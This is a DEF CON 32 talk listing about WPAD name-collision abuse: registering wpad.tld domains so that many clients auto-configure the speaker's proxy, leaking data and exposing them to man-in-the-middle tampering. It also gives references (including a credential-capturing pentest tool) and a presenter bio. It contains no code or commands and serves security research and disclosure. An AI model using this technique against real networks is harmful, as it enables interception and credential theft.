Why are you still, using my server for your internet access.

Presented at DEF CON 32 (2024), Aug. 9, 2024, 4:30 p.m. (45 minutes).

Pawning countries at top level domain by just buying one specific domain name ‘wpad.tld’, come hear about this more the 25+ years old issue and the research from running eight different wpad.tld domains for more than one year that turn into more the 1+ billion DNS request and more then 600+GB of Apache log data with leaked information from the clients. This is the story about how easy it is to just buying one domain and then many hundreds of thousands of Internet clients will get auto pwned without knowing it and start sending traffic to this man-in-the-middle setup there is bypassing encryption and can change content with the ability to get the clients to download harmful content and execute it. The talk will explain the technical behind this issue and showcase why and how clients will be trick into this Man-in-the-middle trap. 1. Description of wpad and the function, include listing the security issue. [link](https://en.wikipedia.org/wiki/Web_Proxy_Auto-Discovery_Protocol) 2. Navigator Proxy Auto-Config File Format from March 1996 [link](https://web.archive.org/web/20070307124216/http://wp.netscape.com/eng/mozilla/2.0/relnotes/demo/proxy-live.html) 3. INTERNET-DRAFT 1999 for Web Proxy Auto-Discovery Protocol [link](https://datatracker.ietf.org/doc/html/draft-ietf-wrec-wpad-01) 4. Microsoft Security Bulletin MS99-054 Critical Vulnerability from 1999 [link](https://learn.microsoft.com/en-us/security-updates/securitybulletins/1999/ms99-054) 5. Description of the wpad PAC javascript format. [link](https://findproxyforurl.com/) 6. Pentesting tool with function as a WPAD Proxy Server to capture credentials from clients. [link](https://github.com/SpiderLabs/Responder) 7. WPAD Name Collision Vulnerability [link](https://www.cisa.gov/news-events/alerts/2016/05/23/wpad-name-collision-vulnerability) 8. WPAD Vulnerability [link](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10183) [link](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16996) 9. ICANN - Root Cause Analysis - wpad.domain.name [link](https://www.icann.org/en/system/files/files/root-cause-analysis-wpad-18jan23-en.pdf) 10. Windows proxy settings ultimate guide part – WPAD/PAC configuration file - [link](https://igorpuhalo.wordpress.com/2022/03/02/windows-proxy-settings-ultimate-guide-part-i-wininet-vs-winhttp/) - [link](https://igorpuhalo.wordpress.com/2022/07/15/windows-proxy-settings-ultimate-guide-part-ii-configuring-proxy-settings/) - [link](https://igorpuhalo.wordpress.com/2022/08/09/windows-proxy-settings-ultimate-guide-part-iii-wpad-pac-configuration-file/)

Presenters:

• Thomas Boejstrup Johansen
  Thomas Boejstrup Johansen aka Tooms has been in professional IT for more than 25+ years, where the first 11+ years were as a system administrator for a large Danish company and the last 14+ years as a security specialist with the work in the field of Reverse Engineering Malware, Incident Response and Forensics but also physical redteam engagements and pentesting for customers. The last many years have been mainly as lead senior forensics investigator and incident response on many incidents including some more well known major incidents like the incident in 2021 there got known around the world as Microsoft Exchange Hafnium vulnerability.

Similar Presentations:

• Black Hat USA 2016 / badWPAD
• DEF CON 32 (2024) / Laundering Money
• DEF CON 32 (2024) / Android App Usage and Cell Tower Location: Private. Sensitive. Available to Anyone?